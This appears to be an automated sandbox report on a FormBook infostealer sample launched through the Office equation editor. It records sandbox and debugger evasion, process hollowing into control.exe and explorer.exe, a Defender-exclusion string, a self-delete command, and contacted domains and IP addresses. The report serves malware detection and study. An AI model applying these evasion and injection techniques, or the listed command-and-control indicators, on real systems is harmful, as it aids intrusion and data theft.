Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001B2DD9 push ecx; retf 4_2_001B2DDB
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001B2DCF push ecx; retf 4_2_001B2DD1
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001B069A push FFFFFFBAh; retf 4_2_001B069C
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_0057C8D4 push eax; retf 4_2_0057C8D8
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0041E041 pushfd ; iretd 5_2_0041E051
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_004170CB push edi; ret 5_2_004170CC
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0041D0D2 push eax; ret 5_2_0041D0D8
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0041D0DB push eax; ret 5_2_0041D142
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0041D085 push eax; ret 5_2_0041D0D8
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00416888 push FFFFFFFAh; ret 5_2_00416890
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0041D13C push eax; ret 5_2_0041D142
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00416C3E push ecx; retf 5_2_00416C3F
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0041DD3C push cs; ret 5_2_0041DD3D
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0041DD82 push ebp; retf 5_2_0041DD83
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00417628 push ds; iretd 5_2_0041762B
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_01225097 push ss; retf 5_2_012250A0
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_01224AEA push ebx; retf 5_2_01224B11
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0093DFA1 push ecx; ret 5_2_0093DFB4
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F8DFA1 push ecx; ret 7_2_01F8DFB4
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000FE041 pushfd ; iretd 7_2_000FE051
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000FD085 push eax; ret 7_2_000FD0D8
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000F70CB push edi; ret 7_2_000F70CC
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000FD0DB push eax; ret 7_2_000FD142
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000FD0D2 push eax; ret 7_2_000FD0D8
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000FD13C push eax; ret 7_2_000FD142
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000F7628 push ds; iretd 7_2_000F762B
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000F6888 push FFFFFFFAh; ret 7_2_000F6890
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000F6C3E push ecx; retf 7_2_000F6C3F
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000FDD3C push cs; ret 7_2_000FDD3D
Source: initial sample Static PE information: section name: .text entropy: 7.56086895782
Source: initial sample Static PE information: section name: .text entropy: 7.56086895782

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\sirtx[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\sirt3512.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x81 0x1E 0xE9
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: 00000004.00000002.2094353245.0000000002741000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: sirt3512.exe PID: 2644, type: MEMORY
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: sirt3512.exe, 00000004.00000002.2094353245.0000000002741000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: sirt3512.exe, 00000004.00000002.2094353245.0000000002741000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Roaming\sirt3512.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\sirt3512.exe RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe RDTSC instruction interceptor: First address: 00000000000E98E4 second address: 00000000000E98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe RDTSC instruction interceptor: First address: 00000000000E9B5E second address: 00000000000E9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00409A90 rdtsc 5_2_00409A90
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1100 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe TID: 2372 Thread sleep time: -102260s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe TID: 2324 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\control.exe TID: 2444 Thread sleep time: -40000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\control.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\control.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Thread delayed: delay time: 102260 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 00000006.00000000.2097308661.00000000001F5000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.2103144355.0000000004234000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000006.00000000.2103167927.0000000004263000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: sirt3512.exe, 00000004.00000002.2094353245.0000000002741000.00000004.00000001.sdmp Binary or memory string: vmware
Source: sirt3512.exe, 00000004.00000002.2094353245.0000000002741000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: sirt3512.exe, 00000004.00000002.2094353245.0000000002741000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000006.00000000.2103084772.00000000041AD000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: sirt3512.exe, 00000004.00000002.2094353245.0000000002741000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: sirt3512.exe, 00000004.00000002.2094353245.0000000002741000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: sirt3512.exe, 00000004.00000002.2094353245.0000000002741000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: sirt3512.exe, 00000004.00000002.2094353245.0000000002741000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: sirt3512.exe, 00000004.00000002.2094353245.0000000002741000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: sirt3512.exe, 00000004.00000002.2094353245.0000000002741000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000006.00000000.2097337474.0000000000231000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00409A90 rdtsc 5_2_00409A90
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0040ACD0 LdrLoadDll, 5_2_0040ACD0
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_009426F8 mov eax, dword ptr fs:[00000030h] 5_2_009426F8
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F926F8 mov eax, dword ptr fs:[00000030h] 7_2_01F926F8
Enables debug privileges
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 40.65.124.100 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.869bernardilane.com
Source: C:\Windows\explorer.exe Domain query: www.363dahlia.com
Source: C:\Windows\explorer.exe Network Connect: 64.98.145.30 80 Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Memory written: C:\Users\user\AppData\Roaming\sirt3512.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Thread register set: target process: 1388 Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Thread register set: target process: 1388 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Section unmapped: C:\Windows\SysWOW64\control.exe base address: B0000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\sirt3512.exe C:\Users\user\AppData\Roaming\sirt3512.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Process created: C:\Users\user\AppData\Roaming\sirt3512.exe C:\Users\user\AppData\Roaming\sirt3512.exe Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\sirt3512.exe' Jump to behavior
Source: explorer.exe, 00000006.00000000.2120233385.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000006.00000000.2120233385.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.2097308661.00000000001F5000.00000004.00000020.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.2120233385.00000000006F0000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Queries volume information: C:\Users\user\AppData\Roaming\sirt3512.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 00000007.00000002.2353252437.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2353301076.0000000000290000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2132134881.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2132063520.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2094658238.0000000003F49000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.2092914206.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2132009638.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2353128733.00000000000E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 5.2.sirt3512.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.sirt3512.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.sirt3512.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.sirt3512.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.sirt3512.exe.3f494f0.5.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 00000007.00000002.2353252437.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2353301076.0000000000290000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2132134881.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2132063520.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2094658238.0000000003F49000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.2092914206.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2132009638.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2353128733.00000000000E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 5.2.sirt3512.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.sirt3512.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.sirt3512.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.sirt3512.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.sirt3512.exe.3f494f0.5.raw.unpack, type: UNPACKEDPE
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs